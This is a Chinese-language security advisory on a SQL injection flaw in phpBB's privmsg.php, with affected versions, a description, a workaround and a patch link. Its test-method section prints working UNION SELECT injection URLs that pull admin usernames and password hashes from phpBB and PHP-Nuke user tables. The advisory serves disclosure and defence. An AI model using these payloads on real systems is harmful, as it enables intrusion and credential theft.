首页 -> 安全研究

安全研究

安全漏洞
PHPBB Privmsg.PHP SQL远程注入漏洞

发布日期:2004-03-26
更新日期:2004-04-01

受影响系统:
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0 RC4
phpBB Group phpBB 2.0 RC3
phpBB Group phpBB 2.0 RC2
phpBB Group phpBB 2.0 RC1
phpBB Group phpBB 2.0 Beta 1
phpBB Group phpBB 2.0
描述:
BUGTRAQ  ID: 9984

phpBB是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。

phpBB包含的'privmsg.php'脚本对用户提交的URI参数缺少充分过滤,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得用户敏感数据信息。

问题存在于'privmsg.php'脚本中,由于对"$pm_sql_user .="参数缺少充分过滤,提交包含恶意SQL命令作为此参数数据,可更改原有数据库逻辑,可获得管理员密码的HASH信息,或破坏数据库。

<*来源:Janek Vind (come2waraxe@yahoo.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108032454818873&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Janek Vind (come2waraxe@yahoo.com)提供了如下测试方法:

phpBB:
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/*

PHP-Nuke:
http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

JeiAr <security@gulftech.org>:
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* JeiAr <security@gulftech.org>提供如下第三方修补方案:

使用如下代码:

$pm_sql_user = '';
$pm_sql_user .= "<random_query_data>";

代替

$pm_sql_user .= "<random_query_data>";

厂商补丁:

phpBB Group
-----------
Shaun Colley <shaunige@yahoo.co.uk>提供如下补丁:

http://www.nettwerked.co.uk/code/privmsg-sqlinj.patch

浏览次数:4331
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障